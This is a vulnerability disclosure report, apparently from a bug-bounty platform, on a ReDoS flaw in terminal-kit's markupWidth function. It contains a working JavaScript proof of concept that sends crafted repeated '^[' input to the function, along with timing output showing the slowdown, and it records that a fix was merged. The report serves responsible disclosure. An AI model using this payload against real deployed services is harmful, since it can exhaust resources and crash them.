Inefficient Regular Expression Complexity in cronvel/terminal-kit

Valid

Reported on

Sep 22nd 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in terminal-kit. It allows cause a denial of service when calling function markupWidth. The ReDoS vulnerability is mainly due to the regex /\^\[[^\]]*]|\^(.)/g and can be exploited with the following code.

Proof of Concept

// PoC.js
var terminalKit = require("terminal-kit/lib/misc.js")

for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = ''+'^['.repeat(i*10000);
    terminalKit.markupWidth(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The Output

"attack_str.length: 20000: 309 ms"
"attack_str.length: 40000: 1047 ms"
"attack_str.length: 60000: 2346 ms"
"attack_str.length: 80000: 4185 ms"
"attack_str.length: 100000: 6505 ms"
"attack_str.length: 120000: 9367 ms"

Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

Occurences

We have contacted a member of the cronvel/terminal-kit team and are waiting to hear back 2 months ago
Cedric Ronvel validated this vulnerability 2 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Cedric Ronvel confirmed that a fix has been merged on a2e446 2 months ago
Cedric Ronvel has been awarded the fix bounty
misc.js#L185 has been validated